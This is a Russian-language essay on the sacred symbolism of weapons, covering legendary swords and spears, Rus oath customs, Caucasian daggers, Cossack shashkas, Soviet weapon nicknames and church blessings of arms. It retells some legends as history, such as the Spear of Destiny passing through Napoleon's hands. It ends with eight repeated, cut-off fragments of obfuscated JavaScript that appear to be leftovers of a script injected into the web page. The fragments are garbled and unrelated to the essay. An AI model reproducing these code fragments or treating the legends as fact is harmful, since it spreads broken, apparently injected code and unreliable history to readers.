В 2011 году, помню, сайты обошла новость: рыбак выловил из Днепра меч. Украшенный серебром и золотом, почти полностью сохранившийся артефакт, по мнению специалистов, принадлежал одному из знатных дружинников. Многие читатели сошлись во мнении, что это меч самого князя Святослава Хороброго. Ведь на этом месте произошла его последняя битва с печенегами. Не одна я сочла это символичным и гадала, к чему такая находка? Не к великим ли переменам? Но скептики замечали, что это может быть меч любого из воинов Святослава. Мне кажется, происходящее в Украине предсказано этой находкой – меч предвещал войну, великие потрясения. И как теперь не верить, что владел им действительно князь, подавший знак своим потомкам?
Сакральное отношение к оружию человек испытывал всегда, наверное, потому что оно равняло его с богами в способности отнимать чужую жизнь. Боги менялись, но как скифы поклонялись Арею, которого символизировал меч на вершине холма, так крестоносец преклонял колени перед своим, вонзенным в землю мечом, в котором видел крест – меч духовный. О поклонении мечу упоминает Лукиан Самосский, когда от имени скифа говорит в своём сочинении: «Мы же, всякий раз как клянемся Ветром и Мечом, призываем Ветер как виновника жизни, а Меч — поскольку он приносит смерть».
В мире мифов и религиозных образов меч символизирует начало высшей справедливости,
сводится к противопоставлению жизни и смерти. С его помощью отсекается всё недостойное и бесплодное, «всякое дерево, не приносящее доброго плода».
Древняя европейская Традиция полна упоминаний о чудесном оружии. Оно непременный атрибут самых могущественных богов. Таковы, например, Гунгнир и Ассал - копья скандинавского Одина и кельтского Луга, таков Мьёлльнир - молот Тора, или волшебный меч Фрейра. Каждый из этих предметов имел множество значений: и архетипическое, и космологическое, и магическое. Священное копье Одина - это и мировая ось, Древо Мира, пронизывающее и объединяющее вселенную видимого и невидимого.
А Копьё судьбы, которым сотник Лонгин пронзил Христа, считается одной из величайших реликвий христианства, дарующей силу и власть своему владельцу. На сей день в различных церквях мира хранится несколько реликвий, которые считаются копьём Лонгина, либо его фрагментом. Учёные пытаются выяснить, какое из них действительно соответствует евангельскому времени. Одно из них - Венское копьё, не раз упоминается в летописях, как принадлежавшее многим великим историческим деятелям. В богатой биографии копья есть эпизоды пребывания на Руси. Им владел отец Александра Невского – Ярослав. Но в итоге наконечник оказался у Мамая. Тот, не понимая ценности куска ржавого железа, отдал его русскому князю Дмитрию в обмен на двух пленных мурз. Получив копьё, Дмитрий одержал победу над Ордой на Куликовом поле. Потомок Дмитрия Донского подарил его князю Ягайло за помощь в битве с немецкими рыцарями, так вновь и вновь священное оружие передавали друг другу европейские владыки. Пока не оказалось оно у Наполеона Бонопарта и тот стал непобедимым. Французский император был уже в самом сердце России, но тут русские каким-то образом узнали его тайну, и простой солдат Кузьма Неткач похищает копьё судьбы, вручает его Кутузову. Следует разгром Наполеона, затем копьё дарят его врагу – австрийскому маршалу Блюхеру. И оно заканчивает свой бранный путь в Вене, став экспонатом. Но и там продолжает влиять на судьбы мира – Гитлер утверждал, что, созерцая его, испытал мистическое озарение.
В богослужении Православной церкви используется копие — обоюдоострый нож для изъятия частиц из просфор, который символизирует собой копьё Лонгина.
В то же время в христианстве обоюдоострый меч — важный символ божественной мудрости и правды: «И соделал уста Мои как острый меч». «Ибо слово Божие живо и действенно и острее всякого меча обоюдоострого: оно проникает до разделения души и духа, составов и мозгов, и судит помышления и намерения сердечные».
В качестве религиозного символа меч до сих пор используется как часть церемониального одеяния епископов восточных церквей.
В Западной Европе ритуал принятия в рыцарское братство не обходился без меча. Это оружие - спутник воинственного аристократа, не раз воспето в старинной литературе. Например, в знаменитой «Песне о Роланде», где умирающий рыцарь прощается со своим мечом Дюрандаль, упоминая, что тот некогда был вручён ангелом его королю. Роланд не допускает мысли, что его оружие достанется сарацинам, и перед смертью пытается уничтожить меч, разбивая о камень. Но есть предание, что именно сохранившийся Дюрандаль был прикован к скале возле церкви старинного французского селения Рокамадур, а сейчас передан в музей. Любопытно, что именно этот артефакт вдохновил Дж. Р. Р. Толкиена на создание образа сломанного меча в его знаменитой эпопее «Властелин колец». Такова перекличка времён и мифов.
В Древней Руси одним из способов закрепления договоров являлась клятва. Наиболее часто употребляли языческую клятву оружием, которая в той или иной вариации присутствует во всех договорах, и осталась в Повести временных лет. Текст клятвы позволяет узнать состав оружия - в договоре 944 года перечисляют щиты, обнаженные мечи, поручи, стрелы. «Да не защитятся они собственными щитами, и да погибнут они от мечей своих, от стрел и от иного своего оружия в случае клятвопреступления», – примерно такая формулировка употреблялась в документах. Арабский путешественник Ибн-Даста, описывая быт и обычаи наших предков, свидетельствовал: «Если у кого из руссов, рождается сын, то отец берет оголенный меч, кладет его перед новорожденным и говорит: «Не оставляю тебе в наследство никакого имущества, а будешь ты иметь только то, что приобретешь этим мечом».
Хотя самые возвышенные и мистические эпизоды в фольклоре – от пословиц до мифов связаны с мечом, наиболее часто в пословицах упоминается топор и нож, поскольку меч был скорее оружием аристократа, чем повсеместно встречающееся оружие крестьянина.
В древней Киевской Руси у славянских воинов мечей поначалу почти не было из-за закона, принятого Карлом Великим (742-814 гг.) запрещавшего торговлю этим видом оружия с восточными славянами. Те немногие мечи, что попадали на Русь в обход запрета, стоили дорого. Именно вопрос вооружения мечами как основным оружием боя встал перед князем Владимиром и другими князьями. И при нём на Руси стали массово производить их. Cохранились несколько древних мечей, с которыми связаны воспоминания не только исторические, но религиозные. Например, мечи принадлежавшие псковским князьям Всеволоду и Довмонту, сберегались в Троицком соборе Пскова, а теперь находятся в местном музее-заповеднике. Хотя некоторые специалисты относят момент создания этих раритетов к другому времени, людям хочется верить, что мечи принадлежали именно этим историческим персонажам.
Идеологический и мистический смысл оружия и сегодня часть духовной культуры.
Мало кто знает, что одна из самых известных и высоких советских скульптур — «Родина-мать зовет!», установленная в Волгограде на Мамаевом кургане, является лишь второй частью композиции, которая состоит сразу из трех элементов. Триптих включает в себя ещё два монумента: «Тыл — фронту», который установлен в Магнитогорске и «Воин-освободитель», расположенный в Трептов-парке в Берлине. Все три скульптуры объединяет один общий элемент — Меч Победы. Первая часть трилогии «Тыл — фронту», расположенная в Магнитогорске, символизирует советский тыл, который обеспечил стране победу в войне. Согласно статистическим данным — каждый второй танк и каждый третий снаряд в годы войны был сделан из магнитогорской стали. На рисунках летописцев изображения князя с поднятым мечом означает победу и воинскую удачу - и Мать-Родина с поднятым мечом также говорит о связи времён и символов. Взывает к архетипам, таящимся в сознании народа.
Образ оружия, которое помогало предкам защищать и завоёвывать, будит родовую память. Не об этом ли рассуждает кто-то на форуме охотников: «Оружие, передающееся по наследству... На вас нахлынут воспоминания при ощущении его в руках, вы сливаетесь во что-то единое. Это не кусок железки, купленный в дорогом оружейном магазине в центре Москвы или другого города. Это что-то, что вам дорого, что-то свое, родное. Вы доверяете ему. Оружие несет энергетику тех, кто пользовался им».
Для горцев Кавказа сакральное значение имеет кинжал. Его передавали из поколения в поколение. Клялись, как на священном Коране. Дарение кинжала, шашки или обмен оружием символизировали дружбу, установление мира. В доисламские времена у некоторых горских народов наличествовали клинковые святилища возле деревьев и камней, где почитались сверхъестественные силы. Поскольку считалось, что кинжал наделён своей душой, его дарение порой сопровождалось ритуалами, чтобы не навредил новому хозяину. Его украшали не только орнаментом, но и семейными символами.
Порой при встрече старого воина с женщиной, несущей мальчика, старец снимал пояс с кинжалом и оставлял оружие для младенца, словно передавая ему завет быть настоящим мужчиной.
Осталось такое предание: когда имам Чечни и Дагестана Шамиль находился в плену, к нему зашёл офицер с вестью о том, что у русского императора родился наследник. Имам молился. Он ничего не ответил, но, отложив Коран, снял с себя пояс с кинжалом и положил рядом. Офицер рассказал об этом царю, тот велел вызвать имама и поинтересовался, почему тот остался безучастным к столь важному событию?
На что Шамиль ответил: «Я в течение двадцати пяти лет войны с Россией не распоясывался ни разу, но в честь рождения вашего сына сделал это немедленно». Говорят, с того дня Шамиль никогда не носил оружия.
У казаков по сей день осталось сакральное отношение к шашке. Почти утратив свой смысл как боевое оружие, но и по сей день состоящая на вооружении Российской армии, шашка порой является на торжественных мероприятиях как атрибут парадной формы и наградное оружие. Ритуалы и обряды, связанные с ней, вернулись к казачеству вместе с его возрождением как военной силы. Шашка является важной деталью, символом полноты прав казака.
Её вручали без темляка семнадцатилетнему юноше, а в двадцать один год молодой казак, отправляясь на службу, получал темляк, погоны и кокарду. По некоторым сведениям, казак мог присутствовать с ней даже в церкви, а во время церковной службы держал руку на эфесе и мог слегка выдвинуть оружие из ножен – чтобы «сталь слушала». В то же время это значило, что казак всегда готов встать на защиту христианства.
В старинных представлениях донского казачества оружие выступало как эффективное средство борьбы с нечистой силой. Шашка, пистолет, пика помогают казаку бороться с дьяволом в старинных сказах. На проводах казак в воротах с коня стрелял в землю, а затем выезжал на улицу. На оружии казаки приносили клятвы с той же формулой, что и воины князя Игоря. В Задонье на Крещение, стреляли из ружей в воздух. В казацких думах могилу герою копали «шаблями». По воспоминаниям старожилов, в станице Казанской в казачьих могилах в гробу находили шашки. Их прибивали на крышки гробов, или клали туда во время отпевания. В быту оружие выполняло функции охранительной и репродуктивной магии, например, шашку или ружье клали под кровать молодоженам, шашку вешали над роженицей, для охраны от сглаза. От рождения до смерти сопровождает казака это оружие.
В древности у некоторых народов существовало представление, что душа воина после его гибели может переселиться в меч. Порой боец считал свой меч личностью. Традиция давать имена оружию дошла до наших дней из тех времён, когда имя казалось словом мистическим, предвещающим характер и судьбу. У каждого народа свои особенности наименования систем оружия. Когда-то интернет обошло фото, где батюшка освящает ракету «Сатана». Конечно, случай курьезный. И название в стиле западном, где любят подчеркивать грозный характер оружия - танки «Тигр» и «Пантера», многоцелевой зенитный комплекс «Гепард», противотанковый ракетный комплекс «Дракон». Но для русских, как я заметила, типично давать оружию имена из мира природы, словно призывая на помощь её всеобъемлющую силу. Системы залпового огня — в честь природных явлений: «Град», «Смерч», «Ураган». Обманчиво невинные названия цветов для пушки «Гиацинт» и самоходной минометной установка «Тюльпан», артиллерийской установки «Пион», гаубицы «Гвоздика» и «Акация», миномет «Василек».
Топографические названия даны средствам ПВО – «Тунгуска», «Шилка», «Нева», «Двина». Кроме официальных названий, солдаты часто дают прозвища оружию, у которого есть только аббревиатура. На форуме танкистов: «Про то, что Т-64Б - это "Сосна" узнал совсем недавно из инета. Про "Ольху" и "Березу" знал с момента первого знакомства с ними, при чем "Березу" чаще всего называли ласково "Березка"». Возможно, таким образом, люди пытаются сродниться с экстремальной обстановкой, как будто оживляя и приручая металл. Антропоморфизм. Вот и у Пушкина «Всё возьму, сказал булат» - символ героизма в вечном споре с ним злата - символа торговли всем и вся.
- Заговорили «Катюши», - не раз читали мы в книгах о войне, и это ассоциировалось у советских людей с армией-защитницей. Есть несколько версий того, как оружие с коротким названием БМ-13 стало именоваться «Катюшей». Самая популярная связана с любимой народом песней «Катюша». Фронтовики не обделили именами многие виды оружия, например, гаубицу М-30 прозвали «Матушкой», пушку-гаубицу МЛ-20 — «Емелькой». В дальнейшем, по аналогии с «Катюшей», ряд прозвищ («Андрюша», «Ванюша») был дан бойцами и другим установкам (БМ-31 и др.) реактивной артиллерии, миномётные установки назывались «Маруся». Но эти названия менее известны.
От имени недалеко и до крещения - об этом напоминает ритуал освящения оружия.
Но как сочетается с ним заповедь «Не убий»? Римо-католическая энциклопедия 1917 года упоминает о таком ритуале. У православных существует специальный «Воинский требник», где есть чины освящения оружия, знамен, воинов. Это не чуждо Беларуси и Украине. Из новостей - в белорусской части освятили автоматы. Освящение межконтинентальных баллистических ракет перед их запуском «стало доброй традицией», по мнению настоятеля храма патриаршего подворья при штабе Ракетных войск стратегического назначения. Но, думаю, такое вмешательство политики в религию напоминает о суевериях, подобных заговорам. В «Основах социальной концепции РПЦ» сказано: «Признавая войну злом, Церковь все же не воспрещает своим чадам участвовать в боевых действиях, если речь идет о защите ближних и восстановлении попранной справедливости. Тогда война считается хотя и нежелательным, но вынужденным средством». Это уже человеческое измышление. Но любопытно, если оружие друг против друга освящают христиане, каждый считая себя правым, возможно ли по результату войны узнать, на чьей стороне провидение?
Как поясняет один белорусский пастырь: «В основе освящения находятся два момента – просьба к Богу о том, чтобы какой-либо предмет не был использован вольно или невольно во зло, и обещание самого владельца содействовать с помощью освящаемого предмета добру».
// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e